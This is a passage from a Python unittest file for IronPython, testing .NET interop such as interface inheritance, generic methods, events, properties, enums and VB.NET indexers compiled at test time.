self.assertTrue(l.get0() == 22)
def test_interface_inheritance(self):
"""Verify we can inherit from a class that inherits from an interface"""
class MyComparer(System.Collections.IComparer):
def Compare(self, x, y): return 0
class MyDerivedComparer(MyComparer): pass
class MyFurtherDerivedComparer(MyDerivedComparer): pass
# Check that MyDerivedComparer and MyFurtherDerivedComparer can be used as an IComparer
array = System.Array[int](list(range(10)))
System.Array.Sort(array, 0, 10, MyComparer())
System.Array.Sort(array, 0, 10, MyDerivedComparer())
System.Array.Sort(array, 0, 10, MyFurtherDerivedComparer())
def test_inheritance_generic_method(self):
"""Verify we can inherit from an interface containing a generic method"""
from IronPythonTest import IGenericMethods, GenericMethodTester
class MyGenericMethods(IGenericMethods):
def Factory0(self, TParam = None):
self.type = clr.GetClrType(TParam).FullName
return TParam("123")
def Factory1(self, x, T):
self.type = clr.GetClrType(T).FullName
return T("456") + x
def OutParam(self, x, T):
x.Value = T("2")
return True
def RefParam(self, x, T):
x.Value = x.Value + T("10")
def Wild(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.args[2].Value = kwargs['T2']('1.5')
return self.args[3][0]
c = MyGenericMethods()
self.assertEqual(GenericMethodTester.TestIntFactory0(c), 123)
self.assertEqual(c.type, 'System.Int32')
self.assertEqual(GenericMethodTester.TestStringFactory1(c, "789"), "456789")
self.assertEqual(c.type, 'System.String')
self.assertEqual(GenericMethodTester.TestIntFactory1(c, 321), 777)
self.assertEqual(c.type, 'System.Int32')
self.assertEqual(GenericMethodTester.TestStringFactory0(c), '123')
self.assertEqual(c.type, 'System.String')
self.assertEqual(GenericMethodTester.TestOutParamString(c), '2')
self.assertEqual(GenericMethodTester.TestOutParamInt(c), 2)
self.assertEqual(GenericMethodTester.TestRefParamString(c, '10'), '1010')
self.assertEqual(GenericMethodTester.TestRefParamInt(c, 10), 20)
x = System.Collections.Generic.List[System.Int32]((2, 3, 4))
r = GenericMethodTester.GoWild(c, True, 'second', x)
self.assertEqual(r.Length, 2)
self.assertEqual(r[0], 1.5)
x = System.Collections.Generic.List[int]((2, 3, 4))
r = GenericMethodTester.GoWildBig(c, True, 'second', x)
self.assertEqual(r.Length, 2)
self.assertEqual(r[0], 1.5)
def test_bases(self):
#
# Verify that changing __bases__ works
#
class MyExceptionComparer(System.Exception, System.Collections.IComparer):
def Compare(self, x, y): return 0
class MyDerivedExceptionComparer(MyExceptionComparer): pass
e = MyExceptionComparer()
MyDerivedExceptionComparer.__bases__ = (System.Exception, System.Collections.IComparer)
MyDerivedExceptionComparer.__bases__ = (MyExceptionComparer,)
class NewType:
def NewTypeMethod(self): return "NewTypeMethod"
class MyOtherExceptionComparer(System.Exception, System.Collections.IComparer, NewType):
def Compare(self, x, y): return 0
MyExceptionComparer.__bases__ = MyOtherExceptionComparer.__bases__
self.assertEqual(e.NewTypeMethod(), "NewTypeMethod")
self.assertTrue(isinstance(e, System.Exception))
self.assertTrue(isinstance(e, System.Collections.IComparer))
self.assertTrue(isinstance(e, MyExceptionComparer))
class MyIncompatibleExceptionComparer(System.Exception, System.Collections.IComparer, System.IDisposable):
def Compare(self, x, y): return 0
            def Dispose(self): pass
self.assertRaisesRegex(TypeError, "__bases__ assignment: 'MyExceptionComparer' object layout differs from 'IronPython.NewTypes.System.Exception#IComparer#IDisposable_*",
setattr, MyExceptionComparer, "__bases__", MyIncompatibleExceptionComparer.__bases__)
self.assertRaisesRegex(TypeError, "__class__ assignment: 'MyExceptionComparer' object layout differs from 'IronPython.NewTypes.System.Exception#IComparer#IDisposable_*",
setattr, MyExceptionComparer(), "__class__", MyIncompatibleExceptionComparer().__class__)
def test_open_generic(self):
        # Inheriting from an open generic instantiation should fail with a good error message
try:
class Foo(System.Collections.Generic.IEnumerable): pass
except TypeError:
(exc_type, exc_value, exc_traceback) = sys.exc_info()
self.assertTrue(str(exc_value).__contains__("cannot inhert from open generic instantiation"))
def test_interface_slots(self):
# slots & interfaces
class foo(object):
__slots__ = ['abc']
class bar(foo, System.IComparable):
def CompareTo(self, other):
return 23
class baz(bar): pass
def test_op_Implicit_inheritance(self):
"""should inherit op_Implicit from base classes"""
from IronPythonTest import NewClass
a = NewClass()
self.assertEqual(int(a), 1002)
self.assertEqual(int(a), 1002)
self.assertEqual(NewClass.op_Implicit(a), 1002)
def test_symbol_dict(self):
"""tests to verify that Symbol dictionaries do the right thing in dynamic scenarios
same as the tests in test_class, but we run this in a module that has imported clr"""
def CheckDictionary(C):
# add a new attribute to the type...
C.newClassAttr = 'xyz'
self.assertEqual(C.newClassAttr, 'xyz')
# add non-string index into the class and instance dictionary
a = C()
try:
a.__dict__[1] = '1'
C.__dict__[2] = '2'
self.assertEqual(1 in a.__dict__, True)
self.assertEqual(2 in C.__dict__, True)
self.assertEqual(dir(a).__contains__(1), True)
self.assertEqual(dir(a).__contains__(2), True)
self.assertEqual(dir(C).__contains__(2), True)
self.assertEqual(repr(a.__dict__), "{1: '1'}")
self.assertEqual(repr(C.__dict__).__contains__("2: '2'"), True)
except TypeError:
# new-style classes have dict-proxy, can't do the assignment
pass
# replace a class dictionary (containing non-string keys) w/ a normal dictionary
C.newTypeAttr = 1
self.assertEqual(hasattr(C, 'newTypeAttr'), True)
try:
C.__dict__ = {}
self.fail("Unreachable code reached")
except AttributeError:
pass
# replace an instance dictionary (containing non-string keys) w/ a new one.
a.newInstanceAttr = 1
self.assertEqual(hasattr(a, 'newInstanceAttr'), True)
a.__dict__ = dict(a.__dict__)
self.assertEqual(hasattr(a, 'newInstanceAttr'), True)
a.abc = 'xyz'
self.assertEqual(hasattr(a, 'abc'), True)
self.assertEqual(getattr(a, 'abc'), 'xyz')
class NewClass(object):
def __init__(self): pass
CheckDictionary(NewClass)
def test_generic_TypeGroup(self):
# TypeGroup is used to expose "System.IComparable" and "System.IComparable`1" as "System.IComparable"
# repr
self.assertEqual(repr(System.IComparable), "<types 'IComparable', 'IComparable[T]'>")
# Test member access
self.assertEqual(System.IComparable.CompareTo(1,1), 0)
self.assertEqual(System.IComparable.CompareTo(1,2), -1)
self.assertEqual(System.IComparable[int].CompareTo(1,1), 0)
self.assertEqual(System.IComparable[int].CompareTo(1,2), -1)
self.assertEqual(System.IComparable[System.Int32].CompareTo(System.Int32(1),System.Int32(1)), 0)
self.assertEqual(System.IComparable[System.Int32].CompareTo(System.Int32(1),System.Int32(2)), -1)
self.assertEqual(System.IComparable[int].CompareTo(big(1),big(1)), 0)
self.assertEqual(System.IComparable[int].CompareTo(big(1),big(2)), -1)
self.assertTrue(dir(System.IComparable).__contains__("CompareTo"))
self.assertTrue(list(vars(System.IComparable).keys()).__contains__("CompareTo"))
import IronPythonTest
genericTypes = IronPythonTest.NestedClass.InnerGenericClass
        # conversion to Type
self.assertTrue(System.Type.IsAssignableFrom(System.IComparable, int))
self.assertRaises(TypeError, System.Type.IsAssignableFrom, object, genericTypes)
# Test illegal type instantiation
try:
System.IComparable[int, int]
except ValueError: pass
else: self.fail("Unreachable code reached")
try:
System.EventHandler(None)
except TypeError: pass
else: self.fail("Unreachable code reached")
def handler():
pass
try:
System.EventHandler(handler)("sender", None)
except TypeError: pass
else: self.fail("Unreachable code reached")
def handler(s,a):
pass
# Test constructor
self.assertEqual(System.EventHandler(handler).GetType(), System.Type.GetType("System.EventHandler"))
self.assertEqual(System.EventHandler[System.EventArgs](handler).GetType().GetGenericTypeDefinition(), System.Type.GetType("System.EventHandler`1"))
# Test inheritance
class MyComparable(System.IComparable):
def CompareTo(self, other):
return self.Equals(other)
myComparable = MyComparable()
self.assertTrue(myComparable.CompareTo(myComparable))
try:
class MyDerivedClass(genericTypes): pass
except TypeError: pass
else: self.fail("Unreachable code reached")
# Use a TypeGroup to index a TypeGroup
t = genericTypes[System.IComparable]
t = genericTypes[System.IComparable, int]
try:
System.IComparable[genericTypes]
except TypeError: pass
else: self.fail("Unreachable code reached")
def test_generic_only_TypeGroup(self):
from IronPythonTest import BinderTest
try:
BinderTest.GenericOnlyConflict()
except System.TypeLoadException as e:
self.assertTrue(str(e).find('requires a non-generic type') != -1)
self.assertTrue(str(e).find('GenericOnlyConflict') != -1)
def test_autodoc(self):
import os
from System.Threading import Thread, ThreadStart
self.assertTrue(Thread.__doc__.find('Thread(start: ThreadStart)') != -1)
self.assertTrue(Thread.__new__.__doc__.find('__new__(cls: type, start: ThreadStart)') != -1)
# self.assertEqual(Thread.__new__.Overloads[ThreadStart].__doc__, '__new__(cls : type, start: ThreadStart)' + os.linesep)
def test_type_descs(self):
from IronPythonTest import TypeDescTests
if is_netcoreapp:
clr.AddReference("System.ComponentModel.Primitives")
test = TypeDescTests()
# new style tests
class bar(int): pass
b = bar(2)
class foo(object): pass
c = foo()
#test.TestProperties(...)
res = test.GetClassName(test)
self.assertTrue(res == 'IronPythonTest.TypeDescTests')
#res = test.GetClassName(a)
#self.assertTrue(res == 'list')
res = test.GetClassName(c)
self.assertTrue(res == 'foo')
res = test.GetClassName(b)
self.assertTrue(res == 'bar')
res = test.GetConverter(b)
x = res.ConvertTo(None, None, b, int)
self.assertTrue(x == 2)
self.assertTrue(type(x) == int)
x = test.GetDefaultEvent(b)
self.assertTrue(x == None)
x = test.GetDefaultProperty(b)
self.assertTrue(x == None)
x = test.GetEditor(b, object)
self.assertTrue(x == None)
x = test.GetEvents(b)
self.assertTrue(x.Count == 0)
x = test.GetEvents(b, None)
self.assertTrue(x.Count == 0)
x = test.GetProperties(b)
self.assertTrue(x.Count > 0)
self.assertTrue(test.TestProperties(b, [], []))
bar.foobar = property(lambda x: 42)
self.assertTrue(test.TestProperties(b, ['foobar'], []))
bar.baz = property(lambda x:42)
self.assertTrue(test.TestProperties(b, ['foobar', 'baz'], []))
delattr(bar, 'baz')
self.assertTrue(test.TestProperties(b, ['foobar'], ['baz']))
# Check that adding a non-string entry in the dictionary does not cause any grief.
b.__dict__[1] = 1
self.assertTrue(test.TestProperties(b, ['foobar'], ['baz']))
#self.assertTrue(test.TestProperties(test, ['GetConverter', 'GetEditor', 'GetEvents', 'GetHashCode'] , []))
# old style tests
class foo: pass
a = foo()
self.assertTrue(test.TestProperties(a, [], []))
res = test.GetClassName(a)
self.assertTrue(res == 'foo')
x = test.CallCanConvertToForInt(a)
self.assertTrue(x == False)
x = test.GetDefaultEvent(a)
self.assertTrue(x == None)
x = test.GetDefaultProperty(a)
self.assertTrue(x == None)
x = test.GetEditor(a, object)
self.assertTrue(x == None)
x = test.GetEvents(a)
self.assertTrue(x.Count == 0)
x = test.GetEvents(a, None)
self.assertTrue(x.Count == 0)
x = test.GetProperties(a, (System.ComponentModel.BrowsableAttribute(True), ))
self.assertTrue(x.Count == 0)
foo.bar = property(lambda x:'hello')
self.assertTrue(test.TestProperties(a, ['bar'], []))
delattr(foo, 'bar')
self.assertTrue(test.TestProperties(a, [], ['bar']))
a = a.__class__
self.assertTrue(test.TestProperties(a, [], []))
foo.bar = property(lambda x:'hello')
self.assertTrue(test.TestProperties(a, [], []))
delattr(a, 'bar')
self.assertTrue(test.TestProperties(a, [], ['bar']))
x = test.GetClassName(a)
self.assertEqual(x, 'IronPython.Runtime.Types.PythonType')
x = test.CallCanConvertToForInt(a)
self.assertEqual(x, False)
x = test.GetDefaultEvent(a)
self.assertEqual(x, None)
x = test.GetDefaultProperty(a)
self.assertEqual(x, None)
x = test.GetEditor(a, object)
self.assertEqual(x, None)
x = test.GetEvents(a)
self.assertEqual(x.Count, 0)
x = test.GetEvents(a, None)
self.assertEqual(x.Count, 0)
x = test.GetProperties(a)
self.assertTrue(x.Count == 0)
# Ensure GetProperties checks the attribute dictionary
a = foo()
a.abc = 42
x = test.GetProperties(a)
for prop in x:
if prop.Name == 'abc':
break
else:
self.fail("Unreachable code reached")
def test_char(self):
for x in range(256):
c = System.Char.Parse(chr(x))
self.assertEqual(c, chr(x))
self.assertEqual(chr(x), c)
if c == chr(x): pass
else: self.assertTrue(False)
if not c == chr(x): self.assertTrue(False)
if chr(x) == c: pass
else: self.assertTrue(False)
if not chr(x) == c: self.assertTrue(False)
def test_repr(self):
from IronPythonTest import UnaryClass, BaseClass, BaseClassStaticConstructor
if is_netcoreapp:
clr.AddReference('System.Drawing.Primitives')
else:
clr.AddReference('System.Drawing')
from System.Drawing import Point
self.assertEqual(repr(Point(1,2)).startswith('<System.Drawing.Point object'), True)
self.assertEqual(repr(Point(1,2)).endswith('[{X=1,Y=2}]>'),True)
# these 3 classes define the same repr w/ different \r, \r\n, \n versions
a = UnaryClass(3)
b = BaseClass()
c = BaseClassStaticConstructor()
ra = repr(a)
rb = repr(b)
rc = repr(c)
sa = ra.find('HelloWorld')
sb = rb.find('HelloWorld')
sc = rc.find('HelloWorld')
self.assertEqual(ra[sa:sa+13], rb[sb:sb+13])
self.assertEqual(rb[sb:sb+13], rc[sc:sc+13])
self.assertEqual(ra[sa:sa+13], 'HelloWorld...') # \r\n should be removed, replaced with ...
def test_explicit_interfaces(self):
from IronPythonTest import OverrideTestDerivedClass, IOverrideTestInterface
otdc = OverrideTestDerivedClass()
self.assertEqual(otdc.MethodOverridden(), "OverrideTestDerivedClass.MethodOverridden() invoked")
self.assertEqual(IOverrideTestInterface.MethodOverridden(otdc), 'IOverrideTestInterface.MethodOverridden() invoked')
self.assertEqual(IOverrideTestInterface.x.GetValue(otdc), 'IOverrideTestInterface.x invoked')
self.assertEqual(IOverrideTestInterface.y.GetValue(otdc), 'IOverrideTestInterface.y invoked')
IOverrideTestInterface.x.SetValue(otdc, 'abc')
self.assertEqual(OverrideTestDerivedClass.Value, 'abcx')
IOverrideTestInterface.y.SetValue(otdc, 'abc')
self.assertEqual(OverrideTestDerivedClass.Value, 'abcy')
self.assertEqual(otdc.y, 'OverrideTestDerivedClass.y invoked')
self.assertEqual(IOverrideTestInterface.Method(otdc), "IOverrideTestInterface.method() invoked")
self.assertEqual(hasattr(otdc, 'IronPythonTest_IOverrideTestInterface_x'), False)
# we can also do this the ugly way:
self.assertEqual(IOverrideTestInterface.x.__get__(otdc, OverrideTestDerivedClass), 'IOverrideTestInterface.x invoked')
self.assertEqual(IOverrideTestInterface.y.__get__(otdc, OverrideTestDerivedClass), 'IOverrideTestInterface.y invoked')
self.assertEqual(IOverrideTestInterface.__getitem__(otdc, 2), 'abc')
self.assertEqual(IOverrideTestInterface.__getitem__(otdc, 2), 'abc')
self.assertRaises(NotImplementedError, IOverrideTestInterface.__setitem__, otdc, 2, 3)
try:
IOverrideTestInterface.__setitem__(otdc, 2, 3)
except NotImplementedError: pass
else: self.fail("Unreachable code reached")
def test_field_helpers(self):
from IronPythonTest import OverrideTestDerivedClass
otdc = OverrideTestDerivedClass()
OverrideTestDerivedClass.z.SetValue(otdc, 'abc')
self.assertEqual(otdc.z, 'abc')
self.assertEqual(OverrideTestDerivedClass.z.GetValue(otdc), 'abc')
def test_field_descriptor(self):
from IronPythonTest import MySize
self.assertEqual(MySize.width.__get__(MySize()), 0)
self.assertEqual(MySize.width.__get__(MySize(), MySize), 0)
def test_field_const_write(self):
from IronPythonTest import MySize, ClassWithLiteral
try:
MySize.MaxSize = 23
except AttributeError as e:
self.assertTrue(str(e).find('MaxSize') != -1)
self.assertTrue(str(e).find('MySize') != -1)
try:
ClassWithLiteral.Literal = 23
except AttributeError as e:
self.assertTrue(str(e).find('Literal') != -1)
self.assertTrue(str(e).find('ClassWithLiteral') != -1)
try:
ClassWithLiteral.__dict__['Literal'].__set__(None, 23)
except AttributeError as e:
self.assertTrue(str(e).find('int') != -1)
try:
ClassWithLiteral.__dict__['Literal'].__set__(ClassWithLiteral(), 23)
except AttributeError as e:
self.assertTrue(str(e).find('int') != -1)
try:
MySize().MaxSize = 23
except AttributeError as e:
self.assertTrue(str(e).find('MaxSize') != -1)
self.assertTrue(str(e).find('MySize') != -1)
try:
ClassWithLiteral().Literal = 23
except AttributeError as e:
self.assertTrue(str(e).find('Literal') != -1)
self.assertTrue(str(e).find('ClassWithLiteral') != -1)
def test_field_const_access(self):
from IronPythonTest import MySize, ClassWithLiteral
self.assertEqual(MySize().MaxSize, System.Int32.MaxValue)
self.assertEqual(MySize.MaxSize, System.Int32.MaxValue)
self.assertEqual(ClassWithLiteral.Literal, 5)
self.assertEqual(ClassWithLiteral().Literal, 5)
def test_array(self):
arr = System.Array[int]([0])
self.assertEqual(repr(arr), str(arr))
self.assertEqual(repr(System.Array[int]([0, 1])), 'Array[int]((0, 1))')
def test_strange_inheritance(self):
"""verify that overriding strange methods (such as those that take caller context) doesn't
flow caller context through"""
from IronPythonTest import StrangeOverrides
s = self
class m(StrangeOverrides):
def SomeMethodWithContext(self, arg):
s.assertEqual(arg, 'abc')
def ParamsMethodWithContext(self, *arg):
s.assertEqual(arg, ('abc', 'def'))
def ParamsIntMethodWithContext(self, *arg):
s.assertEqual(arg, (2,3))
a = m()
a.CallWithContext('abc')
a.CallParamsWithContext('abc', 'def')
a.CallIntParamsWithContext(2, 3)
def test_nondefault_indexers(self):
if not self.has_vbc(): return
import os
import _random
r = _random.Random()
r.seed()
fname = 'vbproptest1_%d.vb' % os.getpid()
self.write_to_file(fname, """
Public Class VbPropertyTest
private Indexes(23) as Integer
private IndexesTwo(23,23) as Integer
private shared SharedIndexes(5,5) as Integer
Public Property IndexOne(ByVal index as Integer) As Integer
Get
return Indexes(index)
End Get
Set
Indexes(index) = Value
End Set
End Property
Public Property IndexTwo(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return IndexesTwo(index, index2)
End Get
Set
IndexesTwo(index, index2) = Value
End Set
End Property
Public Shared Property SharedIndex(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return SharedIndexes(index, index2)
End Get
Set
SharedIndexes(index, index2) = Value
End Set
End Property
End Class""")
try:
name = os.path.join(self.temporary_dir, 'vbproptest%f.dll' % (r.random()))
x = self.run_vbc('/target:library %s "/out:%s"' % (fname, name))
self.assertEqual(x, 0)
clr.AddReferenceToFileAndPath(name)
import VbPropertyTest
x = VbPropertyTest()
self.assertEqual(x.IndexOne[0], 0)
x.IndexOne[1] = 23
self.assertEqual(x.IndexOne[1], 23)
self.assertEqual(x.IndexTwo[0,0], 0)
x.IndexTwo[1,2] = 5
self.assertEqual(x.IndexTwo[1,2], 5)
self.assertEqual(VbPropertyTest.SharedIndex[0,0], 0)
VbPropertyTest.SharedIndex[3,4] = 42
self.assertEqual(VbPropertyTest.SharedIndex[3,4], 42)
finally:
os.unlink(fname)
def test_nondefault_indexers_overloaded(self):
if not self.has_vbc(): return
import os
import _random
r = _random.Random()
r.seed()
fname = 'vbproptest1_%d.vb' % os.getpid()
self.write_to_file(fname, """
Public Class VbPropertyTest
private Indexes(23) as Integer
private IndexesTwo(23,23) as Integer
private shared SharedIndexes(5,5) as Integer
Public Property IndexOne(ByVal index as Integer) As Integer
Get
return Indexes(index)
End Get
Set
Indexes(index) = Value
End Set
End Property
Public Property IndexTwo(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return IndexesTwo(index, index2)
End Get
Set
IndexesTwo(index, index2) = Value
End Set
End Property
Public Shared Property SharedIndex(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return SharedIndexes(index, index2)
End Get
Set
SharedIndexes(index, index2) = Value
End Set
End Property
End Class
Public Class VbPropertyTest2
Public ReadOnly Property Prop() As string
get
return "test"
end get
end property
Public ReadOnly Property Prop(ByVal name As String) As string
get
return name
end get
end property
End Class""")
try:
name = os.path.join(self.temporary_dir, 'vbproptest%f.dll' % (r.random()))
self.assertEqual(self.run_vbc('/target:library %s /out:"%s"' % (fname, name)), 0)
clr.AddReferenceToFileAndPath(name)
import VbPropertyTest, VbPropertyTest2
x = VbPropertyTest()
self.assertEqual(x.IndexOne[0], 0)
x.IndexOne[1] = 23
self.assertEqual(x.IndexOne[1], 23)
self.assertEqual(x.IndexTwo[0,0], 0)
x.IndexTwo[1,2] = 5
self.assertEqual(x.IndexTwo[1,2], 5)
self.assertEqual(VbPropertyTest.SharedIndex[0,0], 0)
VbPropertyTest.SharedIndex[3,4] = 42
self.assertEqual(VbPropertyTest.SharedIndex[3,4], 42)
self.assertEqual(VbPropertyTest2().Prop, 'test')
self.assertEqual(VbPropertyTest2().get_Prop('foo'), 'foo')
finally:
os.unlink(fname)
def test_interface_abstract_events(self):
from IronPythonTest import IEventInterface, AbstractEvent, SimpleDelegate, UseEvent
s = self
# inherit from an interface or abstract event, and define the event
for baseType in [IEventInterface, AbstractEvent]:
class foo(baseType):
def __init__(self):
self._events = []
def add_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.append(value)
def remove_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.remove(value)
def MyRaise(self):
for x in self._events: x()
global called
called = False
def bar(*args):
global called
called = True
a = foo()
a.MyEvent += bar
a.MyRaise()
self.assertEqual(called, True)
a.MyEvent -= bar
called = False
a.MyRaise()
self.assertEqual(called, False)
# hook the event from the CLI side, and make sure that raising
# it causes the CLI side to see the event being fired.
UseEvent.Hook(a)
a.MyRaise()
self.assertEqual(UseEvent.Called, True)
UseEvent.Called = False
UseEvent.Unhook(a)
a.MyRaise()
self.assertEqual(UseEvent.Called, False)
@unittest.skipIf(is_debug, "assertion failure")
def test_dynamic_assembly_ref(self):
# verify we can add a reference to a dynamic assembly, and
# then create an instance of that type
class foo(object): pass
clr.AddReference(foo().GetType().Assembly)
import IronPython.NewTypes.System
for x in dir(IronPython.NewTypes.System):
if x.startswith('Object_'):
t = getattr(IronPython.NewTypes.System, x)
x = t(foo)
break
else:
# we should have found our type
self.fail('No type found!')
def test_nonzero(self):
from System import Single, Byte, SByte, Int16, UInt16, Int64, UInt64
for t in [Single, Byte, SByte, Int16, UInt16, Int64, UInt64]:
self.assertTrue(hasattr(t, '__bool__'))
if t(0): self.fail("Unreachable code reached")
if not t(1): self.fail("Unreachable code reached")
def test_virtual_event(self):
from IronPythonTest import VirtualEvent, OverrideVirtualEvent, SimpleDelegate, UseEvent
s = self
# inherit from a class w/ a virtual event and a
# virtual event that's been overridden. Check both
# overriding it and not overriding it.
for baseType in [VirtualEvent, OverrideVirtualEvent]:
for override in [True, False]:
class foo(baseType):
def __init__(self):
self._events = []
if override:
def add_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.append(value)
def remove_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.remove(value)
def add_MyCustomEvent(self, value): pass
def remove_MyCustomEvent(self, value): pass
def MyRaise(self):
for x in self._events: x()
else:
def MyRaise(self):
self.FireEvent()
# normal event
global called
called = False
def bar(*args):
global called
called = True
a = foo()
a.MyEvent += bar
a.MyRaise()
self.assertTrue(called)
a.MyEvent -= bar
called = False
a.MyRaise()
self.assertFalse(called)
# custom event
a.LastCall = None
a = foo()
a.MyCustomEvent += bar
if override: self.assertEqual(a.LastCall, None)
else: self.assertTrue(a.LastCall.endswith('Add'))
a.LastCall = None
a.MyCustomEvent -= bar
if override: self.assertEqual(a.LastCall, None)
else: self.assertTrue(a.LastCall.endswith('Remove'))
# hook the event from the CLI side, and make sure that raising
# it causes the CLI side to see the event being fired.
UseEvent.Hook(a)
a.MyRaise()
self.assertTrue(UseEvent.Called)
UseEvent.Called = False
UseEvent.Unhook(a)
a.MyRaise()
self.assertFalse(UseEvent.Called)
def test_property_get_set(self):
if is_netcoreapp:
clr.AddReference("System.Drawing.Primitives")
else:
clr.AddReference("System.Drawing")
from System.Drawing import Size
temp = Size()
self.assertEqual(temp.Width, 0)
temp.Width = 5
self.assertEqual(temp.Width, 5)
for i in range(5):
temp.Width = i
self.assertEqual(temp.Width, i)
def test_write_only_property_set(self):
from IronPythonTest import WriteOnly
obj = WriteOnly()
self.assertRaises(AttributeError, getattr, obj, 'Writer')
def test_isinstance_interface(self):
self.assertTrue(isinstance('abc', System.Collections.IEnumerable))
def test_constructor_function(self):
'''
Test to hit IronPython.Runtime.Operations.ConstructionFunctionOps.
'''
self.assertEqual(System.DateTime.__new__.__name__, '__new__')
self.assertTrue(System.DateTime.__new__.__doc__.find('__new__(cls: type, year: Int32, month: Int32, day: Int32)') != -1)
self.assertTrue(System.AssemblyLoadEventArgs.__new__.__doc__.find('__new__(cls: type, loadedAssembly: Assembly)') != -1)
def test_class_property(self):
"""__class__ should work on standard .NET types and should return the type object associated with that class"""
self.assertEqual(System.Environment.Version.__class__, System.Version)
def test_null_str(self):
"""if a .NET type has a bad ToString() implementation that returns null always return String.Empty in Python"""
from IronPythonTest import RudeObjectOverride
self.assertEqual(str(RudeObjectOverride()), '')
self.assertEqual(RudeObjectOverride().__str__(), '')
self.assertEqual(RudeObjectOverride().ToString(), None)
self.assertTrue(repr(RudeObjectOverride()).startswith('<IronPythonTest.RudeObjectOverride object at '))
def test_keyword_construction_readonly(self):
from IronPythonTest import ClassWithLiteral
self.assertRaises(AttributeError, System.Version, 1, 0, Build=100)
self.assertRaises(AttributeError, ClassWithLiteral, Literal=3)
def test_kw_construction_types(self):
if is_netcoreapp:
clr.AddReference("System.IO.FileSystem.Watcher")
for val in [True, False]:
x = System.IO.FileSystemWatcher('.', EnableRaisingEvents = val)
self.assertEqual(x.EnableRaisingEvents, val)
def test_as_bool(self):
"""verify using expressions in if statements works correctly. This generates an
site whose return type is bool so it's important this works for various ways we can
generate the body of the site, and use the site both w/ the initial & generated targets"""
from IronPythonTest import NestedClass
if is_netcoreapp:
clr.AddReference("System.Runtime")
clr.AddReference("System.Threading.Thread")
else:
clr.AddReference('System') # ensure test passes in ipy
# instance property
x = System.Uri('http://foo')
for i in range(2):
if x.AbsolutePath: pass
else: self.fail('instance property')
# instance property on type
for i in range(2):
if System.Uri.AbsolutePath: pass
else: self.fail('instance property on type')
# static property
for i in range(2):
if System.Threading.Thread.CurrentThread: pass
else: self.fail('static property')
# static field
for i in range(2):
if System.String.Empty: self.fail('static field')
# instance field
x = NestedClass()
for i in range(2):
if x.Field: self.fail('instance field')
# instance field on type
for i in range(2):
if NestedClass.Field: pass
else: self.fail('instance field on type')
# math
for i in range(2):
if System.Int64(1) + System.Int64(1): pass
else: self.fail('math')
for i in range(2):
if System.Int64(1) + System.Int64(1): pass
else: self.fail('math')
# GetItem
x = System.Collections.Generic.List[str]()
x.Add('abc')
for i in range(2):
if x[0]: pass
else: self.fail('GetItem')
def test_generic_getitem(self):
if is_netcoreapp:
clr.AddReference("System.Collections")
# calling __getitem__ is the same as indexing
self.assertEqual(System.Collections.Generic.Stack.__getitem__(int), System.Collections.Generic.Stack[int])
# but __getitem__ on a type takes precedence
self.assertRaises(TypeError, System.Collections.Generic.List.__getitem__, int)
x = System.Collections.Generic.List[int]()
x.Add(0)
self.assertEqual(System.Collections.Generic.List[int].__getitem__(x, 0), 0)
# but we can call type.__getitem__ with the instance
self.assertEqual(type.__getitem__(System.Collections.Generic.List, int), System.Collections.Generic.List[int])
@unittest.skipIf(is_netcoreapp, 'no System.Windows.Forms')
def test_multiple_inheritance(self):
"""multiple inheritance from two types in the same hierarchy should work, this is similar to class foo(int, object)"""
clr.AddReference("System.Windows.Forms")
class foo(System.Windows.Forms.Form, System.Windows.Forms.Control): pass
def test_struct_no_ctor_kw_args(self):
from IronPythonTest import Structure
for x in range(2):
s = Structure(a=3)
self.assertEqual(s.a, 3)
def test_nullable_new(self):
from System import Nullable
self.assertEqual(clr.GetClrType(Nullable[()]).IsGenericType, False)
def test_ctor_keyword_args_newslot(self):
"""ctor keyword arg assignment contruction w/ new slot properties"""
from IronPythonTest import BinderTest
x = BinderTest.KeywordDerived(SomeProperty = 'abc')
self.assertEqual(x.SomeProperty, 'abc')
x = BinderTest.KeywordDerived(SomeField = 'abc')
self.assertEqual(x.SomeField, 'abc')
def test_enum_truth(self):
# zero enums are false, non-zero enums are true
StringSplitOptionsNone = getattr(System.StringSplitOptions, "None")
self.assertTrue(not StringSplitOptionsNone)
self.assertTrue(System.StringSplitOptions.RemoveEmptyEntries)
self.assertEqual(StringSplitOptionsNone.__bool__(), False)
self.assertEqual(System.StringSplitOptions.RemoveEmptyEntries.__bool__(), True)
def test_enum_repr(self):
clr.AddReference('IronPython')
from IronPython.Runtime import ModuleOptions
self.assertEqual(repr(ModuleOptions.ShowClsMethods), 'IronPython.Runtime.ModuleOptions.ShowClsMethods')
self.assertEqual(repr(ModuleOptions.ShowClsMethods | ModuleOptions.Optimized),
'<enum IronPython.Runtime.ModuleOptions: ShowClsMethods, Optimized>')
def test_bad_inheritance(self):
"""verify a bad inheritance reports the type name you're inheriting from"""
def f():
class x(System.Single): pass
def g():
class x(System.Version): pass
self.assertRaisesPartialMessage(TypeError, 'System.Single', f)
self.assertRaisesPartialMessage(TypeError, 'System.Version', g)
@unittest.skipIf(is_netcoreapp21, "TODO: figure out")
def test_disposable(self):
"""classes implementing IDisposable should automatically support the with statement"""
from IronPythonTest import DisposableTest
x = DisposableTest()
with x:
pass
self.assertEqual(x.Called, True)
self.assertTrue(hasattr(x, '__enter__'))
self.assertTrue(hasattr(x, '__exit__'))
x = DisposableTest()
x.__enter__()
try:
pass
finally:
self.assertEqual(x.__exit__(None, None, None), None)
self.assertEqual(x.Called, True)
self.assertTrue('__enter__' in dir(x))
self.assertTrue('__exit__' in dir(x))
self.assertTrue('__enter__' in dir(DisposableTest))
self.assertTrue('__exit__' in dir(DisposableTest))
def test_dbnull(self):
"""DBNull should not be true"""
if System.DBNull.Value:
self.fail('System.DBNull.Value should not be true')
def test_special_repr(self):
import System
list = System.Collections.Generic.List[object]()
self.assertEqual(repr(list), 'List[object]()')
list.Add('abc')
self.assertEqual(repr(list), "List[object](['abc'])")
list.Add(2)
self.assertEqual(repr(list), "List[object](['abc', 2])")
list.Add(list)
self.assertEqual(repr(list), "List[object](['abc', 2, [...]])")
dict = System.Collections.Generic.Dictionary[object, object]()
